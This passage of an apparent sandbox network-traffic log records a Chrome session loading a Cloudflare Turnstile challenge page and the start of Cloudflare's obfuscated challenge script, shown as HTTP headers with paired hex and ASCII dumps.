                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: iframe
                                                                              Referer: https://banirego.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:44 UTC1362INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 26635
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                              cross-origin-embedder-policy: require-corp
                                                                              cross-origin-opener-policy: same-origin
                                                                              cross-origin-resource-policy: cross-origin
                                                                              origin-agent-cluster: ?1
                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              referrer-policy: same-origin
                                                                              document-policy: js-profiling
                                                                              2025-01-10 20:41:44 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 66 37 64 35 32 34 63 34 36 38 63 39 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                              Data Ascii: Server: cloudflareCF-RAY: 8fff7d524c468c95-EWRalt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:44 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                              Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                              Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                              Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                              Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                              Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                              Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                              Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.549753104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:44 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fff7d524c468c95&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:44 UTC331INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:44 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 120201
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d57cb741a48-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:44 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30
                                                                              Data Ascii: 2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_feedback_report":"Having%20trouble%3F","time_check_cached_warning":"Your%20device%20clock%20is%20set%20
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 2c 66 42 2c 66 4c 2c 66 57 2c 67 30 2c 67 61 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 35 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 39 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 35 39 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 38 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 37 39 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 36 37 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 34 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74
                                                                              Data Ascii: ,fB,fL,fW,g0,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1455))/1*(parseInt(gI(1259))/2)+-parseInt(gI(1659))/3*(-parseInt(gI(1288))/4)+-parseInt(gI(1079))/5+parseInt(gI(967))/6*(parseInt(gI(514))/7)+parseInt
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 29 5d 29 3f 47 5b 67 50 28 38 33 36 29 5d 28 6f 5b 67 50 28 35 36 32 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 67 4e 28 38 30 31 29 5d 5b 67 4e 28 32 32 30 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 67 4e 28 32 39 32 29 5d 28 43 2c 78 5b 67 4e 28 36 33 33 29 5d 29 3b 44 3d 78 5b 43 5d 2c 45 3d 65 52 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 6f 5b 67 4e 28 36 30 36 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 67 4e 28 35 32 35 29 5d 28 68 5b 44 5d 29 2c 67 4e 28 39 38 35 29 3d 3d 3d 69 2b 44 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 6f 5b 67 4e 28 38 37 33 29 5d 28 73 2c 6f 5b 67 4e 28 35 36 32 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29
                                                                              Data Ascii: )])?G[gP(836)](o[gP(562)](H,1),1):H+=1);return G}}(x),B='nAsAaAb'.split('A'),B=B[gN(801)][gN(220)](B),C=0;o[gN(292)](C,x[gN(633)]);D=x[C],E=eR(g,h,D),B(E)?(F=o[gN(606)]('s',E)&&!g[gN(525)](h[D]),gN(985)===i+D?s(i+D,E):F||o[gN(873)](s,o[gN(562)](i,D),h[D])
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 72 6e 20 68 2d 69 7d 2c 27 51 67 46 65 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 57 48 4d 51 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 43 70 6c 6a 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 68 42 54 47 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 71 57 72 41 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 45 56 66 53 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 65 6a 6c 53 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 56 6d 79
                                                                              Data Ascii: rn h-i},'QgFeu':function(h,i){return h<i},'WHMQa':function(h,i){return h|i},'Cplji':function(h,i){return h==i},'hBTGf':function(h,i){return i==h},'qWrAp':function(h,i){return h<<i},'EVfSE':function(h,i){return h-i},'ejlSr':function(h,i){return h!==i},'Vmy
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 51 2c 52 29 7b 72 65 74 75 72 6e 20 51 7c 7c 52 7d 2c 27 47 70 6c 65 50 27 3a 64 5b 67 56 28 31 33 33 35 29 5d 2c 27 55 4c 48 78 46 27 3a 66 75 6e 63 74 69 6f 6e 28 51 2c 52 29 7b 72 65 74 75 72 6e 20 51 2b 52 7d 2c 27 4d 56 6f 77 76 27 3a 66 75 6e 63 74 69 6f 6e 28 51 2c 52 29 7b 72 65 74 75 72 6e 20 51 2b 52 7d 2c 27 57 6d 42 70 68 27 3a 66 75 6e 63 74 69 6f 6e 28 51 2c 52 29 7b 72 65 74 75 72 6e 20 51 2b 52 7d 2c 27 58 48 78 70 78 27 3a 67 56 28 31 31 33 35 29 2c 27 6f 78 6c 65 51 27 3a 64 5b 67 56 28 31 31 32 32 29 5d 2c 27 77 67 43 65 45 27 3a 67 56 28 34 31 31 29 7d 2c 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d
                                                                              Data Ascii: ':function(Q,R){return Q||R},'GpleP':d[gV(1335)],'ULHxF':function(Q,R){return Q+R},'MVowv':function(Q,R){return Q+R},'WmBph':function(Q,R){return Q+R},'XHxpx':gV(1135),'oxleQ':d[gV(1122)],'wgCeE':gV(411)},null==i)return'';for(B={},C={},D='',E=2,F=3,G=2,H=
                                                                              2025-01-10 20:41:44 UTC1369INData Raw: 77 69 74 63 68 28 4e 5b 4f 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 45 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 44 3d 64 5b 67 56 28 38 31 33 29 5d 28 53 74 72 69 6e 67 2c 4c 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 42 5b 4d 5d 3d 46 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 67 56 28 31 36 35 37 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 69 66 28 4f 62 6a 65 63 74 5b 67 56 28 31 34 33 31 29 5d 5b 67 56 28 31 31 30 30 29 5d 5b 67 56 28 31 33 35 34 29 5d 28 43 2c 44 29 29 7b 69 66 28 32 35 36 3e 44 5b 67 56 28 31 31 36 37 29 5d 28 30 29 29 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 64 5b 67 56 28 35 33 30
                                                                              Data Ascii: witch(N[O++]){case'0':E--;continue;case'1':D=d[gV(813)](String,L);continue;case'2':B[M]=F++;continue;case'3':0==E&&(E=Math[gV(1657)](2,G),G++);continue;case'4':if(Object[gV(1431)][gV(1100)][gV(1354)](C,D)){if(256>D[gV(1167)](0)){for(x=0;x<G;I<<=1,d[gV(530
